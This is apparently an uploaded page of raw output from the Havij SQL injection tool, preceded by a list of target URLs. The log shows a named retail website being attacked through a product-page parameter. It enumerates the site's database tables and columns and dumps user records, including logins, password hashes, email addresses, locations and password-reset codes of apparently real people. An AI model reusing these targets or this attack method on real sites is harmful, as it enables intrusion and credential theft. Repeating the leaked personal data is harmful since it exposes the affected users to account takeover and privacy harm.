SQL

http://www.pro-design.at/index.php?
t=1&lang=en/&hID=120
http://www.partidodeltrabajo.org.mx/articulo.php?
http://www.f-toys.net/index.php?m=fproduct&t=detaile&product_id=163://:title
Havij 1.152 Pro!

Analyzing http://www.playsand.com.hk/main/product.php?cat=28
Host IP: 113.29.252.100
Web Server: Microsoft-IIS/8.0
Powered-by: PHP/5.2.16
Powered-by: ASP.NET
Keyword Found: Balloon
Injection type is Integer
DB Server: MySQL >=5
Trying another method using keyword for finding columns count
Findig columns count for MySQL failed!
Current DB: playsand_db
MySQL error based injection method can be used!
Count(table_name) of information_schema.tables where
table_schema=0x706C617973616E645F6462 is 114
Can not get all tables by group_concat!
Count(table_name) of information_schema.tables where
table_schema=0x706C617973616E645F6462 is 114
Bypassing illegal union failed! Turning off this feature
Table found: va_admin_privileges
Table found: va_admin_privileges_settings
Table found: va_admins
Table found: va_ads_assigned
Table found: va_ads_categories
Table found: va_ads_features
Table found: va_ads_features_default
Table found: va_ads_features_groups
Table found: va_ads_images
Table found: va_ads_items
Table found: va_ads_properties
Table found: va_ads_properties_default
Table found: va_ads_types
Table found: va_articles
Table found: va_articles_assigned
Table found: va_articles_categories
Table found: va_articles_images
Table found: va_articles_related
Table found: va_articles_reviews
Table found: va_articles_statuses
Table found: va_banned_contents
Table found: va_banners
Table found: va_banners_assigned
Table found: va_banners_clicks
Table found: va_banners_groups
Table found: va_black_ips
Table found: va_categories
Table found: va_cc_expiry_years
Table found: va_cc_start_years
Table found: va_change_types
Table found: va_companies
Table found: va_countries
Table found: va_coupons
Table found: va_credit_cards
Table found: va_currencies
Table found: va_custom_blocks
Table found: va_events
Table found: va_faq
Table found: va_features
Table found: va_features_default
Table found: va_features_groups
Table found: va_forum
Table found: va_forum_categories
Table found: va_forum_list
Table found: va_forum_messages
Table found: va_forum_moderators
Table found: va_global_settings
Table found: va_header_links
Table found: va_issue_numbers
Table found: va_item_types
Table found: va_items
Table found: va_items_accessories
Table found: va_items_categories
Table found: va_items_downloads
Table found: va_items_downloads_statistic
Table found: va_items_images
Table found: va_items_prices
Table found: va_items_properties
Table found: va_items_properties_values
Table found: va_items_related
Table found: va_items_serials
Table found: va_languages
Table found: va_layouts
Table found: va_manufacturers
Table found: va_news
Table found: va_newsletters
Table found: va_newsletters_emails
Table found: va_newsletters_users
Table found: va_order_custom_properties
Table found: va_order_custom_values
Table found: va_order_statuses
Table found: va_orders
Table found: va_orders_events
Table found: va_orders_items
Table found: va_orders_items_properties
Table found: va_orders_items_serials
Table found: va_orders_notes
Table found: va_orders_properties
Table found: va_orders_serials_activations
Table found: va_page_settings
Table found: va_pages
Table found: va_payment_parameters
Table found: va_payment_systems
Table found: va_polls
Table found: va_polls_options
Table found: va_polls_votes
Table found: va_release_changes
Table found: va_release_types
Table found: va_releases
Table found: va_reviews
Table found: va_shipping_modules
Table found: va_shipping_modules_parameters
Table found: va_shipping_rules
Table found: va_shipping_times
Table found: va_shipping_types
Table found: va_shipping_types_countries
Table found: va_states
Table found: va_support
Table found: va_support_attachments
Table found: va_support_departments
Table found: va_support_messages
Table found: va_support_predefined
Table found: va_support_priorities
Table found: va_support_products
Table found: va_support_statuses
Table found: va_support_time_report
Table found: va_support_types
Table found: va_support_users_departments
Table found: va_support_users_priorities
Table found: va_tax_rates
Table found: va_tax_rates_items
Table found: va_user_types
Table found: va_user_types_settings
Table found: va_users
Count(column_name) of information_schema.columns where
table_schema=0x706C617973616E645F6462 and table_name=0x76615F626C61636B5F697073 is
3
Column found: ip_address
Column found: address_action
Column found: address_notes
table_schema=0x706C617973616E645F6462 and table_name=0x76615F63617465676F72696573
is 23
Column found: category_id
Column found: parent_category_id
Column found: category_path
Column found: category_name
Column found: category_name_hk
Column found: category_order
Column found: is_showing
Column found: show_sub_products
Column found: short_description
Column found: full_description
Column found: image
Column found: image_alt
Column found: image_large
Column found: image_large_alt
Column found: list_template
Column found: details_template
Column found: meta_title
Column found: meta_keywords
Column found: meta_description
Column found: admin_id_added_by
Column found: admin_id_modified_by
Column found: date_added
Column found: date_modified
table_schema=0x706C617973616E645F6462 and
table_name=0x76615F63635F6578706972795F7965617273 is 1
Column found: expiry_year
table_name=0x76615F63635F73746172745F7965617273 is 1
Column found: start_year
table_name=0x76615F6368616E67655F7479706573 is 2
Column found: type_id
Column found: type_name
table_schema=0x706C617973616E645F6462 and table_name=0x76615F636F6D70616E696573 is
11
Column found: company_id
Column found: company_name
Column found: image_small
Column found: image_large
Column found: address_info
Column found: phone_number
Column found: fax_number
Column found: site_url
Column found: contact_email
Column found: short_description
Column found: full_description
table_schema=0x706C617973616E645F6462 and table_name=0x76615F636F756E7472696573 is
5
Column found: country_code
Column found: country_iso_number
Column found: country_order
Column found: country_name
Column found: currency_code
table_schema=0x706C617973616E645F6462 and table_name=0x76615F636F75706F6E73 is 19
Column found: coupon_id
Column found: order_id
Column found: order_item_id
Column found: coupon_code
Column found: coupon_title
Column found: is_active
Column found: discount_type
Column found: discount_amount
Column found: discount_tax_free
Column found: free_postage
Column found: tax_free
Column found: items_all
Column found: items_ids
Column found: users_ids
Column found: minimum_amount
Column found: expiry_date
Column found: is_exclusive
Column found: quantity_limit
Column found: coupon_uses
table_name=0x76615F6372656469745F6361726473 is 3
Column found: credit_card_id
Column found: credit_card_code
Column found: credit_card_name
table_schema=0x706C617973616E645F6462 and table_name=0x76615F757365725F7479706573
is 6
Column found: type_id
Column found: type_name
Column found: is_default
Column found: coupons_ids
table_schema=0x706C617973616E645F6462 and table_name=0x76615F7573657273 is 63
Column found: user_id
Column found: user_type_id
Column found: schoolregno
Column found: schoolname
Column found: is_approved
Column found: coupons_ids
Column found: login
Column found: password
Column found: security_question
Column found: security_answer
Column found: personal_image
Column found: name
Column found: first_name
Column found: last_name
Column found: gender
Column found: birth
Column found: company_id
Column found: company_name
Column found: email
Column found: address1
Column found: address2
Column found: city
Column found: province
Column found: state_code
Column found: zip
Column found: country_code
Column found: phone
Column found: daytime_phone
Column found: evening_phone
Column found: cell_phone
Column found: fax
Column found: delivery_name
Column found: delivery_first_name
Column found: delivery_last_name
Column found: delivery_company_id
Column found: delivery_company_name
Column found: delivery_email
Column found: delivery_address1
Column found: delivery_address2
Column found: delivery_city
Column found: delivery_province
Column found: delivery_state_code
Column found: delivery_zip
Column found: delivery_country_code
Column found: delivery_phone
Column found: delivery_daytime_phone
Column found: delivery_evening_phone
Column found: delivery_cell_phone
Column found: delivery_fax
Column found: howknowus
Column found: newsletter
Column found: noofkids
Column found: ageofkids
Column found: registration_ip
Column found: registration_date
Column found: modified_ip
Column found: modified_date
Column found: last_visit_ip
Column found: last_visit_date
Column found: reset_password_code
Column found: reset_password_date
Count(*) of playsand_db.va_credit_cards is 10
Data Found: credit_card_id,credit_card_code,credit_card_name=1^Visa^VISA
Data Found: credit_card_id,credit_card_code,credit_card_name=2^Visa^VISA Electron
Data Found: credit_card_id,credit_card_code,credit_card_name=3^MC^Mastercard
Data Found: credit_card_id,credit_card_code,credit_card_name=4ÂMEXÂmerican
Express
Data Found: credit_card_id,credit_card_code,credit_card_name=5^Switch^Switch
Data Found: credit_card_id,credit_card_code,credit_card_name=6^Solo^Solo
Data Found: credit_card_id,credit_card_code,credit_card_name=7^JCB^JCB
Data Found: credit_card_id,credit_card_code,credit_card_name=8^Delta^Delta
Data Found: credit_card_id,credit_card_code,credit_card_name=9ÊurocardÊurocard
Data Found: credit_card_id,credit_card_code,credit_card_name=10^discover^Discover
Count(*) of playsand_db.va_users is 47
Turning on 'bypass illegal union' and retrying!
Data Found: =
Can not get all data in one request, lets try one by one
Data Found: user_id=1
Data Found: user_type_id=1
Data Found: login=joy
Data Found: password=c2c8e798aecbc26d86e4805114b03c51
Turning off 'bypass illegal union' and retrying!
Data Found: security_question=
Data Found: security_answer=
Data Found: name=joy
Data Found: first_name=
Data Found: last_name=
Data Found: gender=
Data Found: birth=
Data Found: company_id=
Data Found: company_name=
Data Found: email=jnothing@yahoo.com
Data Found: address1=
Data Found: city=New York
Data Found: province=
Data Found: state_code=NY
Data Found: zip=95000
Data Found: phone=
Data Found: delivery_name=joy
Data Found: delivery_first_name=
Data Found: delivery_last_name=
Data Found: delivery_company_id=
Data Found: delivery_email=
Data Found: delivery_company_name=
Data Found: reset_password_code=
Data Found: reset_password_date=
Data Found: last_visit_date=2017-10-30 12:33:26
Data Found: login=test
Data Found: password=098f6bcd4621d373cade4e832627b4f6
Data Found: name=test test
Data Found: first_name=test
Data Found: last_name=test
Data Found: gender=1
Data Found: birth=0000-00-00
Data Found: company_id=0
Data Found: email=yvonne.so@galaxyasia.net
Data Found: city=Hong Kong
Data Found: state_code=
Data Found: zip=
Data Found: phone=
Data Found: delivery_name=test test
Data Found: delivery_first_name=test
Data Found: delivery_last_name=test
Data Found: delivery_company_id=0
Data Found: delivery_email=yvonne.so@galaxyasia.net
Data Found: reset_password_code=105764ffd1fac4e6
Data Found: reset_password_date=2017-04-16 16:48:30
Data Found: login=eva
Data Found: password=14bd76e02198410c078ab65227ea0794
Data Found: name=eva eva
Data Found: first_name=eva
Data Found: last_name=eva
Data Found: email=eval@hotmail.com
Data Found: zip=
Data Found: phone=
Data Found: delivery_name=eva eva
Data Found: delivery_first_name=eva
Data Found: delivery_last_name=eva
Data Found: reset_password_code=470dade3628583e1
Data Found: reset_password_date=2017-04-16 16:49:44
Data Found: login=Playsand
Data Found: password=ced571ace3a6af405dddc684f3441233
Data Found: name=hani aitizem
Data Found: first_name=hani
Data Found: last_name=aitizem
Data Found: email=hanibani07@yahoo.com
Data Found: city=bandung
Data Found: zip=
Data Found: phone=
Data Found: delivery_name=hani aitizem
Data Found: delivery_first_name=hani
Data Found: delivery_last_name=aitizem
Data Found: delivery_email=hanibani07@yahoo.com
Data Found: login=sonic
Data Found: password=bb5459bf19132d4dc1340654c17331df
Data Found: name=sonic wong
Data Found: first_name=sonic
Data Found: last_name=wong
Data Found: email=sonic.wong@galaxyasia.net
Data Found: zip=
Data Found: phone=
Data Found: delivery_name=sonic wong
Data Found: delivery_first_name=sonic
Data Found: delivery_last_name=wong
Data Found: login=yvonne
Data Found: password=7878847d55c22f58e3a702fc10d98c54
Data Found: name=yvonne yvonne
Data Found: first_name=yvonne
Data Found: last_name=yvonne
Data Found: email=yvonne.so@galaxyasia.net
Data Found: zip=
Data Found: phone=
Data Found: delivery_name=yvonne yvonne
Data Found: delivery_first_name=yvonne
Data Found: delivery_last_name=yvonne
Data Found: login=sowendy
Data Found: password=f4453bdd89ce71d193cd65a4c97ade08
Data Found: name=so wendy
Data Found: first_name=so
Data Found: last_name=wendy

SQL

Diunggah oleh

Informasi Dokumen

Judul Asli

Hak Cipta

Format Tersedia

Bagikan dokumen Ini

Bagikan atau Tanam Dokumen

Opsi Berbagi

Apakah menurut Anda dokumen ini bermanfaat?

Apakah konten ini tidak pantas?

Hak Cipta:

Format Tersedia

SQL

Diunggah oleh

Hak Cipta:

Format Tersedia

http://www.pro-design.at/index.php?

Havij 1.152 Pro!

Anda mungkin juga menyukai